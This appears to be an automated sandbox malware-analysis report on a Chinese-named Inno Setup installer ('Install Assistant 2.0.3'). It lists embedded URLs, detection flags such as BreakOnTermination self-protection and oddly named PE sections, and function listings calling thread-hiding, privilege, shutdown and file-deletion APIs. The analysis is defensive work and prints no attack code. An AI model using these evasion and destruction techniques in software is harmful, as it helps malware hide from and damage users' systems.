Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vac.1.drStatic PE information: section name: .#.q
Source: update.vac.7.drStatic PE information: section name: .#.q
Source: hrsw.vbc.7.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B5690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,7_2_6C0B5690
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33886
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33A6A
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF339CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF339CF
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33D62
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C0B62D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33D18
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33C62
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF31950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6BF31950
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF34754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6BF34754
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF44A277_2_6BF44A27
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF347547_2_6BF34754
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B1DF07_2_6C0B1DF0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B6FB37_2_6C0B6FB3
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C116CE07_2_6C116CE0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C166D107_2_6C166D10
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C184DE07_2_6C184DE0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0E8EA17_2_6C0E8EA1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C102EC97_2_6C102EC9
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16EEF07_2_6C16EEF0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C13AEEF7_2_6C13AEEF
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15E8107_2_6C15E810
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1768207_2_6C176820
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1848707_2_6C184870
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1348967_2_6C134896
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17C8D07_2_6C17C8D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C18A91A7_2_6C18A91A
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1669007_2_6C166900
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17A9307_2_6C17A930
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1789507_2_6C178950
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0E89727_2_6C0E8972
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1869997_2_6C186999
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C18AA007_2_6C18AA00
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C140A527_2_6C140A52
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C174AA07_2_6C174AA0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C100B667_2_6C100B66
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15AB907_2_6C15AB90
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0F0BCA7_2_6C0F0BCA
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17EBC07_2_6C17EBC0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1744897_2_6C174489
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1484AC7_2_6C1484AC
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16E4D07_2_6C16E4D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1525217_2_6C152521
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1785207_2_6C178520
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16C5807_2_6C16C580
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1625807_2_6C162580
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1645D07_2_6C1645D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17E6007_2_6C17E600
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1846C07_2_6C1846C0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1767A07_2_6C1767A0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0EC7CF7_2_6C0EC7CF
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1867C07_2_6C1867C0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C14C7F37_2_6C14C7F3
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1600207_2_6C160020
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16E0E07_2_6C16E0E0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1782007_2_6C178200
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17C2A07_2_6C17C2A0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C163D507_2_6C163D50
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C137D437_2_6C137D43
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C185D907_2_6C185D90
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C169E807_2_6C169E80
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C141F117_2_6C141F11
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15589F7_2_6C15589F
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1778C87_2_6C1778C8
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1699F07_2_6C1699F0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15FA507_2_6C15FA50
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C161AA07_2_6C161AA0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15DAD07_2_6C15DAD0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C10540A7_2_6C10540A
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16F5C07_2_6C16F5C0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C12F5EC7_2_6C12F5EC
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C15B6507_2_6C15B650
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C17F6407_2_6C17F640
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1696E07_2_6C1696E0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1897007_2_6C189700
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1837C07_2_6C1837C0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16F0507_2_6C16F050
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1030927_2_6C103092
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1671F07_2_6C1671F0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16D2807_2_6C16D280
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C16D3807_2_6C16D380
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C176AF07_2_6C176AF0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C1737507_2_6C173750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004081EC11_2_004081EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004481C011_2_004481C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045824011_2_00458240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043425011_2_00434250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045C3C011_2_0045C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004504C811_2_004504C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043865011_2_00438650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0041094311_2_00410943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043C95011_2_0043C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00438C2011_2_00438C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00450E0011_2_00450E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00454EA011_2_00454EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0044D08911_2_0044D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004210AC11_2_004210AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045112011_2_00451120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004591C011_2_004591C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043D1D011_2_0043D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0044518011_2_00445180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045D2C011_2_0045D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004253F311_2_004253F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C53CF11_2_003C53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045D47011_2_0045D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004554D011_2_004554D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0040D49611_2_0040D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045155011_2_00451550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C157211_2_003C1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0041965211_2_00419652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0044D6A011_2_0044D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003D976611_2_003D9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C97CA11_2_003C97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045D9E011_2_0045D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C1AA111_2_003C1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00445E8011_2_00445E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00445F8011_2_00445F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003DE00A11_2_003DE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004422E011_2_004422E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0046230011_2_00462300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0042E49F11_2_0042E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004425F011_2_004425F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004366D011_2_004366D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043A6A011_2_0043A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045E99011_2_0045E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00442A8011_2_00442A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0041AB1111_2_0041AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00446CE011_2_00446CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004470D011_2_004470D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0042B12111_2_0042B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043B18011_2_0043B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045720011_2_00457200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045F3C011_2_0045F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003EB3E411_2_003EB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0044F3A011_2_0044F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043741011_2_00437410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0044F42011_2_0044F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043F50011_2_0043F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0046351A11_2_0046351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045353011_2_00453530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045F59911_2_0045F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0046360111_2_00463601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004577C011_2_004577C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043379011_2_00433790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003EF8E011_2_003EF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043F91011_2_0043F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00413AEF11_2_00413AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00447AF011_2_00447AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003DBAC911_2_003DBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00447C5011_2_00447C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003DBC9211_2_003DBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0043FDF011_2_0043FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: String function: 6C186F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: String function: 6C0E9240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 003C1E40 appears 172 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0045FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 003C28E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F50A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameb1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
